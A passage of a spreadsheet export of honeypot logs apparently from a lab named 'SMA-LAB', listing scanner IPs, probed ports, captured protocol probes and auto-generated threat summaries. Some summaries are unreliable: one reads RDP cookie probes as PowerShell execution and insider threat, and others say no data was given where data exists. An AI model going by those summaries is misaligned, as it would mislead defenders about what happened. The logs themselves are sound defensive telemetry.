B_IMAP_H19&amp;&amp;SMA-LAB_MYSQL_H26&amp;&amp;SMA-LAB_SOCKS5_H46&amp;&amp;SMA-LAB_IMAP_H45&amp;&amp;SMA-LAB_LDAP_H5&amp;&amp;SMA-LAB_FTP_H19&amp;&amp;SMA-LAB_IMAP_H28&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_LDAP_H25&amp;&amp;SMA-LAB_ORACLE_H23&amp;&amp;SMA-LAB_REDIS_H34&amp;&amp;SMA-LAB_REDIS_H11&amp;&amp;SMA-LAB_IMAP_H16&amp;&amp;SMA-LAB_IMAP_H44&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_IMAP_HC1&amp;&amp;SMA-LAB_ORACLE_H46&amp;&amp;SMA-LAB_SNMP_H45&amp;&amp;SMA-LAB_MYSQL_H12&amp;&amp;SMA-LAB_IMAP_H11&amp;&amp;SMA-LAB_ORACLE_H19&amp;&amp;SMA-LAB_POP3_H21&amp;&amp;SMA-LAB_NTP_H19&amp;&amp;SMA-LAB_IMAP_H27&amp;&amp;SMA-LAB_SOCKS5_H31&amp;&amp;SMA-LAB_FTP_H35&amp;&amp;SMA-LAB_ORACLE_H25&amp;&amp;SMA-LAB_SIP_H36&amp;&amp;SMA-LAB_FTP_H47&amp;&amp;SMA-LAB_FTP_H44&amp;&amp;SMA-LAB_SOCKS5_H18&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_PJL_H46&amp;&amp;SMA-LAB_SIP_H6&amp;&amp;SMA-LAB_POP3_H4&amp;&amp;SMA-LAB_MYSQL_H19&amp;&amp;SMA-LAB_MYSQL_H10&amp;&amp;SMA-LAB_MYSQL_H34&amp;&amp;SMA-LAB_SNMP_H27&amp;&amp;SMA-LAB_LDAP_H13&amp;&amp;SMA-LAB_SNMP_H32&amp;&amp;SMA-LAB_POSTGRES_H22</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;3389&amp;&amp;161&amp;&amp;1080&amp;&amp;3306&amp;&amp;9100&amp;&amp;NA&amp;&amp;143&amp;&amp;21&amp;&amp;6379&amp;&amp;9231&amp;&amp;110&amp;&amp;6667&amp;&amp;56378&amp;&amp;50845&amp;&amp;5900&amp;&amp;1521&amp;&amp;60524&amp;&amp;5432&amp;&amp;389&amp;&amp;23&amp;&amp;50598&amp;&amp;1433&amp;&amp;52675&amp;&amp;445&amp;&amp;54215&amp;&amp;57048&amp;&amp;55319&amp;&amp;51107&amp;&amp;49804&amp;&amp;54086&amp;&amp;56283</t>
  </si>
  <si>
    <t>query&amp;&amp;connection&amp;&amp;command&amp;&amp;stshash&amp;&amp;NA&amp;&amp;GET&amp;&amp;request</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=nsAKbEcCS'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=WvVHxp'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=orzmxV'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=jDAUYtDRr'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=uQFeBL'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=WWPBAu'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=oroigugHy'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=SrttIc'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=PKRSQK'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.50,63886)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.50,63890)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.50,63906)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.50,57484)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.50,57488)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.50,57500)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.50,62928)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.50,62930)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.50,62946)}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.50,60748)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.50,60760)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.50,60766)}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=FMzYSfonP'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=JVbUsK'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=JHSiZf'}}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.50,61246)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.50,61250)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.50,61258)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=xnvtOqwtT'}}</t>
  </si>
  <si>
    <t>::ffff:cdd2:1f32</t>
  </si>
  <si>
    <t>The attacker is attempting to brute force and scan various network services, likely searching for vulnerabilities or open ports to exploit. They are also trying to gather information about the systems, such as user credentials, software versions, and system configurations. &amp;&amp; The attackers are attempting to scan and exploit vulnerabilities in various network services, including DHCP, DNS, FTP, HTTP, HTTPS, IMAP, IPP, IRC, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, RDP, REDIS, SIP, SMB, SMTP, SNMP, and SOCKS5. They are likely trying to gain unauthorized access to these services or steal sensitive information. &amp;&amp; Attempted access to Oracle database detected, likely a brute force attack or exploit of vulnerabilities in the database management system. Database credentials may have been compromised or attempts made to gain unauthorized access. Further investigation is needed to determine the full scope of the incident. &amp;&amp; This log indicates a potential brute-force attack on a POP3 email service as no activity is reported, suggesting an attempt to gain unauthorized access by attempting multiple login attempts. The lack of login credentials in the log suggests the attacker was likely testing combinations. &amp;&amp; Malicious activity is detected where an attacker attempts to authenticate with a fake master secret token (mstshash) sent in the 'Cookie' header. This could be a brute-force attack or an attempt to bypass authentication mechanisms. The goal is likely to gain unauthorized access to remote services. &amp;&amp; The data suggests an attempt to execute a PowerShell command using the MSTSH protocol, which is often used by attackers to maintain persistence on compromised systems. This can be indicative of a malicious actor attempting to establish a remote access tool or backdoor connection. The presence of this activity may indicate a potential insider threat or lateral movement.</t>
  </si>
  <si>
    <t>Port scanning and information gathering &amp;&amp;  Port scanning and exploitation &amp;&amp; POP3 Scanning &amp;&amp; Rdp Bruteforce &amp;&amp; RDP Bruteforce</t>
  </si>
  <si>
    <t>2f453a0f7d2ad33a51f61a43cc09b159</t>
  </si>
  <si>
    <t>45.156.128.92</t>
  </si>
  <si>
    <t>NA&amp;&amp;sh-ams-nl-gp1-wk141b.internet-census.org</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Session-termination-event</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_REDIS_H39&amp;&amp;SMA-LAB_SNMP_H37&amp;&amp;SMA-LAB_SIP_H37&amp;&amp;SMA-LAB_HTTPS_H38&amp;&amp;SMA-LAB_HTTPS_H4&amp;&amp;SMA-LAB_LDAP_H29&amp;&amp;SMA-LAB_POSTGRES_H19&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_POP3_H45&amp;&amp;SMA-LAB_SNMP_H8&amp;&amp;SMA-LAB_REDIS_H2&amp;&amp;SMA-LAB_PJL_H32&amp;&amp;SMA-LAB_HTTPS_H2&amp;&amp;SMA-LAB_LDAP_HC1&amp;&amp;SMA-LAB_PJL_H33&amp;&amp;SMA-LAB_POSTGRES_H18&amp;&amp;SMA-LAB_HTTPS_H12&amp;&amp;SMA-LAB_RDP_H15&amp;&amp;SMA-LAB_POSTGRES_H24&amp;&amp;SMA-LAB_IMAP_H24&amp;&amp;SMA-LAB_IMAP_H22</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;6379&amp;&amp;161&amp;&amp;NA&amp;&amp;443&amp;&amp;389&amp;&amp;5432&amp;&amp;40238&amp;&amp;110&amp;&amp;9100&amp;&amp;3389&amp;&amp;143&amp;&amp;23&amp;&amp;3306&amp;&amp;6667&amp;&amp;1521&amp;&amp;21</t>
  </si>
  <si>
    <t>command&amp;&amp;connection&amp;&amp;query&amp;&amp;NA&amp;&amp;GET</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'NFHB0'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000D_
@PJL INFO ID_x000D_
@PJL INFO PRODINFO_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 38.54.42.176:9100_x000D_
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 _x000D_
Accept: */*_x000D_
Accept-Encoding: gzip_x000D_
_x000D_
'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'MPJL0'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 149.102.153.168:9100_x000D_
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 _x000D_
Accept: */*_x000D_
Accept-Encoding: gzip_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'SSH-2.0-Go_x000D_
'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000D_
@PJL INFO ID_x000D_
@PJL INFO PRODINFO_x000D_
'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.97.67', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 156.244.8.69:9100_x000D_
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 _x000D_
Accept: */*_x000D_
Accept-Encoding: gzip_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'SSH-2.0-Go_x000D_
'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'QUIT'}}&amp;&amp;{Data_FTP:NA}</t>
  </si>
  <si>
    <t>::ffff:2d9c:805c</t>
  </si>
  <si>
    <t>The attacker is scanning for open ports and testing services on various protocols, likely trying to identify vulnerabilities or gain unauthorized access to systems. They are also attempting to authenticate with different credentials across multiple services. &amp;&amp; The attacker is attempting to scan and enumerate services on the target system, likely as part of a reconnaissance phase. They are trying various protocols and methods to gain access or gather information about the system's configuration, users, and vulnerabilities. &amp;&amp;  &amp;&amp; There is insufficient information to analyze. &amp;&amp; The user disconnected from the POP3 service abruptly, suggesting a potential reconnaissance or scanning activity.
The QUIT command was issued without any previous actions, which could indicate an attempt to gather information about the service.
This behavior is often seen in pre-attack reconnaissance. &amp;&amp; There is insufficient information to analyze any potential malicious activity. &amp;&amp; No log data provided, so there's nothing to analyze or explain. &amp;&amp; This indicates an attempt by an attacker to access a device's job list, potentially as part of a reconnaissance or exploitation effort.
The attacker may be trying to gather information about the system or its services for future attacks.
This could be a precursor to further malicious activity.</t>
  </si>
  <si>
    <t xml:space="preserve">  &amp;&amp;  &amp;&amp;  &amp;&amp; Scanning Attack</t>
  </si>
  <si>
    <t>d1e8be697b406c0655fd9b05bf2cef73</t>
  </si>
  <si>
    <t>87.236.176.84</t>
  </si>
  <si>
    <t>acclaimed.monitoring.internet-measurement.com&amp;&amp;NA</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:sip']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Remote Fingerprinting Activity&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Encryption Misuse</t>
  </si>
  <si>
    <t>&amp;&amp;SMA-LAB_POSTGRES_H17&amp;&amp;SMA-LAB_PJL_H10&amp;&amp;SMA-LAB_REDIS_H21&amp;&amp;SMA-LAB_IMAP_H31&amp;&amp;SMA-LAB_REDIS_H19&amp;&amp;SMA-LAB_ORACLE_H5&amp;&amp;SMA-LAB_REDIS_H34&amp;&amp;SMA-LAB_IMAP_H35&amp;&amp;SMA-LAB_SOCKS5_H3&amp;&amp;SMA-LAB_REDIS_H7&amp;&amp;SMA-LAB_REDIS_H45&amp;&amp;SMA-LAB_SMB_H29&amp;&amp;SMA-LAB_REDIS_H32&amp;&amp;SMA-LAB_FTP_H40&amp;&amp;SMA-LAB_REDIS_H36&amp;&amp;SMA-LAB_ORACLE_H18&amp;&amp;SMA-LAB_SIP_H38&amp;&amp;SMA-LAB_SOCKS5_H12&amp;&amp;SMA-LAB_REDIS_H22&amp;&amp;SMA-LAB_REDIS_H27&amp;&amp;SMA-LAB_POSTGRES_H11&amp;&amp;SMA-LAB_REDIS_H24&amp;&amp;SMA-LAB_REDIS_H13&amp;&amp;SMA-LAB_POSTGRES_H26&amp;&amp;SMA-LAB_PJL_H7&amp;&amp;SMA-LAB_RDP_H4&amp;&amp;SMA-LAB_REDIS_H23&amp;&amp;SMA-LAB_SIP_H29&amp;&amp;SMA-LAB_REDIS_H38&amp;&amp;SMA-LAB_REDIS_H18&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_SOCKS5_H31&amp;&amp;SMA-LAB_POSTGRES_H40&amp;&amp;SMA-LAB_SOCKS5_H36&amp;&amp;SMA-LAB_REDIS_HC1&amp;&amp;SMA-LAB_REDIS_H5&amp;&amp;SMA-LAB_POSTGRES_H6&amp;&amp;SMA-LAB_POSTGRES_H13&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_LDAP_H2&amp;&amp;SMA-LAB_PJL_H13&amp;&amp;SMA-LAB_SOCKS5_H46&amp;&amp;SMA-LAB_SOCKS5_H16&amp;&amp;SMA-LAB_REDIS_H33&amp;&amp;SMA-LAB_POP3_H30</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5432&amp;&amp;445&amp;&amp;6379&amp;&amp;110&amp;&amp;23&amp;&amp;9100&amp;&amp;143&amp;&amp;1521&amp;&amp;1080&amp;&amp;NA&amp;&amp;3389&amp;&amp;3306&amp;&amp;6667&amp;&amp;443&amp;&amp;21&amp;&amp;389&amp;&amp;59371&amp;&amp;49583&amp;&amp;25</t>
  </si>
  <si>
    <t>GB</t>
  </si>
  <si>
    <t>United Kingdom</t>
  </si>
  <si>
    <t>ENG</t>
  </si>
  <si>
    <t>England</t>
  </si>
  <si>
    <t>Leeds</t>
  </si>
  <si>
    <t>2644688</t>
  </si>
  <si>
    <t>LS1</t>
  </si>
  <si>
    <t>53.8008</t>
  </si>
  <si>
    <t>-1.54908</t>
  </si>
  <si>
    <t>211298</t>
  </si>
  <si>
    <t>Driftnet Ltd</t>
  </si>
  <si>
    <t>Constantine Cybersecurity LTD</t>
  </si>
  <si>
    <t>command&amp;&amp;connection&amp;&amp;query&amp;&amp;GET&amp;&amp;NA&amp;&amp;stshash&amp;&amp;request</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'QUIT'}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.54.79.122', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'HELP'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'SYST'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'FEAT'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'QUIT'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_IRC:{'command': 'HELP', 'params': '[]', 'prefix': ''}}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SMB:Incoming connection (87.236.176.84,47259)}&amp;&amp;{Data_SMB:Incoming connection (87.236.176.84,35919)}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=eltons'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 193.57.138.110:9100_x000D_
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)_x000D_
Connection: close_x000D_
Accept: */*_x000D_
Accept-Encoding: gzip_x000D_
_x000D_
'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'uotjgfzx', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:87.236.176.84;tag=uotjgfzx', 'max-forwards': '0', 'to': 'sip:95.164.118.29', 'via': 'SIP/2.0/UDP 87.236.176.84:5060;branch=z9hG4bKuotjgfzx;received=87.236.176.84;rport=49756'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.54.117.64', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}</t>
  </si>
  <si>
    <t>::ffff:57ec:b054</t>
  </si>
  <si>
    <t>No log data provided, therefore unable to analyze or describe any possible malicious activity. &amp;&amp; No log data provided. &amp;&amp; There is insufficient information to analyze any potential malicious activity.
Activity description: Unknown or unavailable, no logs provided for analysis.</t>
  </si>
  <si>
    <t>There is no log data provided to analyze. Please provide the actual log data for me to identify the types of attacks.</t>
  </si>
  <si>
    <t>72f22998128681da512fb1bdedb9b274</t>
  </si>
  <si>
    <t>45.156.128.93</t>
  </si>
  <si>
    <t>NA&amp;&amp;sh-ams-nl-gp1-wk141c.internet-census.org</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_ORACLE_H39&amp;&amp;SMA-LAB_REDIS_H2&amp;&amp;SMA-LAB_POSTGRES_HC1&amp;&amp;SMA-LAB_LDAP_H29&amp;&amp;SMA-LAB_POSTGRES_H19&amp;&amp;SMA-LAB_POP3_H45&amp;&amp;SMA-LAB_SNMP_H42&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_POSTGRES_H44&amp;&amp;SMA-LAB_SNMP_H19&amp;&amp;SMA-LAB_PJL_H18&amp;&amp;SMA-LAB_LDAP_H24&amp;&amp;SMA-LAB_LDAP_HC1&amp;&amp;SMA-LAB_PJL_H33&amp;&amp;SMA-LAB_POSTGRES_H18&amp;&amp;SMA-LAB_PJL_H47&amp;&amp;SMA-LAB_ORACLE_H29&amp;&amp;SMA-LAB_IMAP_H25&amp;&amp;SMA-LAB_IMAP_H5</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1521&amp;&amp;6379&amp;&amp;5432&amp;&amp;389&amp;&amp;110&amp;&amp;161&amp;&amp;9054&amp;&amp;9100&amp;&amp;143&amp;&amp;5900&amp;&amp;21&amp;&amp;6667&amp;&amp;NA</t>
  </si>
  <si>
    <t>command&amp;&amp;connection&amp;&amp;query&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'HNBE0'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000D_
@PJL INFO ID_x000D_
@PJL INFO PRODINFO_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 77.91.74.218:9100_x000D_
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 _x000D_
Accept: */*_x000D_
Accept-Encoding: gzip_x000D_
_x000D_
'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000D_
@PJL INFO ID_x000D_
@PJL INFO PRODINFO_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 185.74.222.213:9100_x000D_
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 _x000D_
Accept: */*_x000D_
Accept-Encoding: gzip_x000D_
_x000D_
'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0 1.3.6.1.2.1.1.2.0 1.3.6.1.2.1.1.3.0 1.3.6.1.2.1.1.4.0 1.3.6.1.2.1.1.5.0 1.3.6.1.2.1.1.6.0 1.3.6.1.2.1.1.7.0', 'version': '1'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 154.90.63.129:9100_x000D_
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 _x000D_
Accept: */*_x000D_
Accept-Encoding: gzip_x000D_
_x000D_
'}}&amp;&amp;{Data_SNMP:{'community': 'UnKnown', 'oids': 'UnKnown', 'version': 'UnKnown'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000D_
@PJL INFO ID_x000D_
@PJL INFO PRODINFO_x000D_
'}}&amp;&amp;{Data_SIP:NA}</t>
  </si>
  <si>
    <t>::ffff:2d9c:805d</t>
  </si>
  <si>
    <t>There is no data provided, so there's nothing to analyze. &amp;&amp; Possible malicious activity: Attempt to exploit or scan services, likely targeting SIP protocol for potential denial of service (DoS) attack. The lack of specific information suggests a probing or reconnaissance attempt. This could be the first step in a larger cyberattack. &amp;&amp; This indicates that an attempt was made to exploit a service, but no SIP traffic was detected or reported. The lack of SIP data suggests that the attack may have been aimed at a specific vulnerability or service that does not use SIP protocol. It could be a probe for potential vulnerabilities in various services. &amp;&amp; No data provided to analyze.</t>
  </si>
  <si>
    <t>There is no log data provided to analyze. Can you provide the actual log data for me to work with?</t>
  </si>
  <si>
    <t>fc226719396802487ca17ccf9bc5e6c0</t>
  </si>
  <si>
    <t>41.208.71.226</t>
  </si>
  <si>
    <t>41.208.71.226.static.ltt.ly&amp;&amp;NA</t>
  </si>
  <si>
    <t>&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_SMB_H25&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_MSSQL_H20&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_H25</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;1433&amp;&amp;46604&amp;&amp;NA</t>
  </si>
  <si>
    <t>AF</t>
  </si>
  <si>
    <t>Africa</t>
  </si>
  <si>
    <t>LY</t>
  </si>
  <si>
    <t>Libya</t>
  </si>
  <si>
    <t>TB</t>
  </si>
  <si>
    <t>Tripoli</t>
  </si>
  <si>
    <t>2210247</t>
  </si>
  <si>
    <t>32.8872</t>
  </si>
  <si>
    <t>13.1913</t>
  </si>
  <si>
    <t>21003</t>
  </si>
  <si>
    <t>LTT Autonomous System, Tripoli Libya</t>
  </si>
  <si>
    <t>LTT Network Backbone and POPs</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (41.208.71.226,64266)}&amp;&amp;{Data_SMB:Incoming connection (41.208.71.226,64347)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (41.208.71.226,52365)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (41.208.71.226,52428)}&amp;&amp;{Data_SMB:Incoming connection (41.208.71.226,58851)}&amp;&amp;{Data_SMB:Incoming connection (41.208.71.226,58915)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (41.208.71.226,65368)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (41.208.71.226,65434)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (41.208.71.226,62400)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection 